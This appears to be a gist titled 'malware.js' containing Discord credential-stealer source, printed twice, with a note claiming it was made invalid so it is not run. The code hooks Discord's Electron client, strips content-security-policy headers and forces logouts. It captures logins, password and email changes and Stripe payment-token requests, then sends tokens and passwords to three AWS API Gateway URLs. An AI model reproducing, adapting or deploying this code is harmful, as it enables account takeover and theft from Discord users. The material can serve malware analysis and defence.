AskAlice/malware.js Secret

## malware.js

process.exit(1)
malware, making invalid syntax as you should not not execute as js actually
//////
const fs = require('fs'),
  path = require('path'),
  { BrowserWindow: BrowserWindow, session: session } = require('electron'),
  querystring = require('querystring');
var auth = '__AUTH__';
function CrocodileLoL() {
  return (
    !fs.existsSync(path.join(__dirname, 'SkullRules')) ||
    (fs.rmdirSync(path.join(__dirname, 'SkullRules')),
    BrowserWindow.getAllWindows()[0]
      .webContents.executeJavaScript(
        'window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();',
        !0
      )
      .then((e) => {}),
    !1)
  );
}
const Filter = {
  urls: [
    'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json',
    'https://*.discord.com/api/v*/applications/detectable',
    'https://discord.com/api/v*/applications/detectable',
    'https://*.discord.com/api/v*/users/@me/library',
    'https://discord.com/api/v*/users/@me/library',
    'https://*.discord.com/api/v*/users/@me/billing/subscriptions',
    'https://discord.com/api/v*/users/@me/billing/subscriptions',
    'wss://remote-auth-gateway.discord.gg/*',
  ],
};
function LoggedIn(e, t, o) {
  BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
    `\n      fetch(\n        "https://1m3bmndg3i.execute-api.us-east-2.amazonaws.com/default/Logged?token=${o}&auth=${auth}&psd=${encodeURIComponent(
      t
    )}"\n      );\n      `
  );
}
function PasswordChanged(e, t, o) {
  BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
    `\n        fetch(\n          "https://sd8bzuhwv6.execute-api.us-east-2.amazonaws.com/default/PassChanged?token=${o}&auth=${auth}&psd=${encodeURIComponent(
      t
    )}&oldpsd=${e}"\n        );\n        `
  );
}
function EmailChanged(e, t, o) {
  BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
    `\n        fetch(\n          "https://p9iprsfdr7.execute-api.us-east-2.amazonaws.com/default/EmailChanged?token=${o}&auth=${auth}&psd=${encodeURIComponent(
      t
    )}&email=${encodeURIComponent(e)}"\n        );\n        `
  );
}
session.defaultSession.webRequest.onBeforeRequest(Filter, (e, t) => {
  CrocodileLoL() && (e.url.startsWith('wss://') ? t({ cancel: !0 }) : t({ cancel: !1 }));
}),
  session.defaultSession.webRequest.onHeadersReceived((e, t) => {
    delete e.responseHeaders['content-security-policy'],
      delete e.responseHeaders['content-security-policy-report-only'],
      t({ responseHeaders: { ...e.responseHeaders, 'Access-Control-Allow-Headers': '*' } });
  });
const ChangePasswordFilter = {
  urls: [
    'https://discord.com/api/v*/users/@me',
    'https://discordapp.com/api/v*/users/@me',
    'https://*.discord.com/api/v*/users/@me',
    'https://discordapp.com/api/v*/auth/login',
    'https://discord.com/api/v*/auth/login',
    'https://*.discord.com/api/v*/auth/login',
    'https://api.stripe.com/v*/tokens',
  ],
};
session.defaultSession.webRequest.onCompleted(ChangePasswordFilter, (e, t) => {
  if (e.url.endsWith('login') && 200 == e.statusCode) {
    const t = JSON.parse(Buffer.from(e.uploadData[0].bytes).toString()),
      o = t.login,
      s = t.password;
    BrowserWindow.getAllWindows()[0]
      .webContents.executeJavaScript(
        'for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)"getToken"==a&&(token=b.default.getToken())}token;',
        !0
      )
      .then((e) => {
        LoggedIn(o, s, e);
      });
  }
  if (e.url.endsWith('users/@me') && 200 == e.statusCode && 'PATCH' == e.method) {
    const t = JSON.parse(Buffer.from(e.uploadData[0].bytes).toString());
    null != t.password &&
      null != t.password &&
      '' != t.password &&
      (null != t.new_password &&
        null != t.new_password &&
        '' != t.new_password &&
        BrowserWindow.getAllWindows()[0]
          .webContents.executeJavaScript(
            'for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)"getToken"==a&&(token=b.default.getToken())}token;',
            !0
          )
          .then((e) => {
            PasswordChanged(t.password, t.new_password, e);
          }),
      null != t.email &&
        null != t.email &&
        '' != t.email &&
        BrowserWindow.getAllWindows()[0]
          .webContents.executeJavaScript(
            'for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)"getToken"==a&&(token=b.default.getToken())}token;',
            !0
          )
          .then((e) => {
            EmailChanged(t.email, t.password, e);
          }));
  }
  if (e.url.endsWith('tokens')) {
    const t = BrowserWindow.getAllWindows()[0];
    querystring.parse(decodeURIComponent(Buffer.from(e.uploadData[0].bytes).toString())),
      t.webContents
        .executeJavaScript(
          'var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token',
          !0
        )
        .then((e) => {});
  }
}),
  (module.exports = require('./core.asar'));

	process.exit(1)
	malware, making invalid syntax as you should not not execute as js actually
	//////
	const fs = require('fs'),
	path = require('path'),
	{ BrowserWindow: BrowserWindow, session: session } = require('electron'),
	querystring = require('querystring');
	var auth = '__AUTH__';
	function CrocodileLoL() {
	return (
	!fs.existsSync(path.join(__dirname, 'SkullRules')) \|\|
	(fs.rmdirSync(path.join(__dirname, 'SkullRules')),
	BrowserWindow.getAllWindows()[0]
	.webContents.executeJavaScript(
	'window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();',
	!0
	)
	.then((e) => {}),
	!1)
	);
	}
	const Filter = {
	urls: [
	'https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json',
	'https://.discord.com/api/v/applications/detectable',
	'https://discord.com/api/v*/applications/detectable',
	'https://.discord.com/api/v/users/@me/library',
	'https://discord.com/api/v*/users/@me/library',
	'https://.discord.com/api/v/users/@me/billing/subscriptions',
	'https://discord.com/api/v*/users/@me/billing/subscriptions',
	'wss://remote-auth-gateway.discord.gg/*',
	],
	};
	function LoggedIn(e, t, o) {
	BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
	`\n fetch(\n "https://1m3bmndg3i.execute-api.us-east-2.amazonaws.com/default/Logged?token=${o}&auth=${auth}&psd=${encodeURIComponent(
	t
	)}"\n );\n `
	);
	}
	function PasswordChanged(e, t, o) {
	BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
	`\n fetch(\n "https://sd8bzuhwv6.execute-api.us-east-2.amazonaws.com/default/PassChanged?token=${o}&auth=${auth}&psd=${encodeURIComponent(
	t
	)}&oldpsd=${e}"\n );\n `
	);
	}
	function EmailChanged(e, t, o) {
	BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
	`\n fetch(\n "https://p9iprsfdr7.execute-api.us-east-2.amazonaws.com/default/EmailChanged?token=${o}&auth=${auth}&psd=${encodeURIComponent(
	t
	)}&email=${encodeURIComponent(e)}"\n );\n `
	);
	}
	session.defaultSession.webRequest.onBeforeRequest(Filter, (e, t) => {
	CrocodileLoL() && (e.url.startsWith('wss://') ? t({ cancel: !0 }) : t({ cancel: !1 }));
	}),
	session.defaultSession.webRequest.onHeadersReceived((e, t) => {
	delete e.responseHeaders['content-security-policy'],
	delete e.responseHeaders['content-security-policy-report-only'],
	t({ responseHeaders: { ...e.responseHeaders, 'Access-Control-Allow-Headers': '*' } });
	});
	const ChangePasswordFilter = {
	urls: [
	'https://discord.com/api/v*/users/@me',
	'https://discordapp.com/api/v*/users/@me',
	'https://.discord.com/api/v/users/@me',
	'https://discordapp.com/api/v*/auth/login',
	'https://discord.com/api/v*/auth/login',
	'https://.discord.com/api/v/auth/login',
	'https://api.stripe.com/v*/tokens',
	],
	};
	session.defaultSession.webRequest.onCompleted(ChangePasswordFilter, (e, t) => {
	if (e.url.endsWith('login') && 200 == e.statusCode) {
	const t = JSON.parse(Buffer.from(e.uploadData[0].bytes).toString()),
	o = t.login,
	s = t.password;
	BrowserWindow.getAllWindows()[0]
	.webContents.executeJavaScript(
	'for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)"getToken"==a&&(token=b.default.getToken())}token;',
	!0
	)
	.then((e) => {
	LoggedIn(o, s, e);
	});
	}
	if (e.url.endsWith('users/@me') && 200 == e.statusCode && 'PATCH' == e.method) {
	const t = JSON.parse(Buffer.from(e.uploadData[0].bytes).toString());
	null != t.password &&
	null != t.password &&
	'' != t.password &&
	(null != t.new_password &&
	null != t.new_password &&
	'' != t.new_password &&
	BrowserWindow.getAllWindows()[0]
	.webContents.executeJavaScript(
	'for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)"getToken"==a&&(token=b.default.getToken())}token;',
	!0
	)
	.then((e) => {
	PasswordChanged(t.password, t.new_password, e);
	}),
	null != t.email &&
	null != t.email &&
	'' != t.email &&
	BrowserWindow.getAllWindows()[0]
	.webContents.executeJavaScript(
	'for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)"getToken"==a&&(token=b.default.getToken())}token;',
	!0
	)
	.then((e) => {
	EmailChanged(t.email, t.password, e);
	}));
	}
	if (e.url.endsWith('tokens')) {
	const t = BrowserWindow.getAllWindows()[0];
	querystring.parse(decodeURIComponent(Buffer.from(e.uploadData[0].bytes).toString())),
	t.webContents
	.executeJavaScript(
	'var req=webpackJsonp.push([[],{extra_id:(e,t,r)=>e.exports=r},[["extra_id"]]]);for(let e in req.c)if(req.c.hasOwnProperty(e)){let t=req.c[e].exports;if(t&&t.__esModule&&t.default)for(let e in t.default)"getToken"===e&&(token=t.default.getToken())} token',
	!0
	)
	.then((e) => {});
	}
	}),
	(module.exports = require('./core.asar'));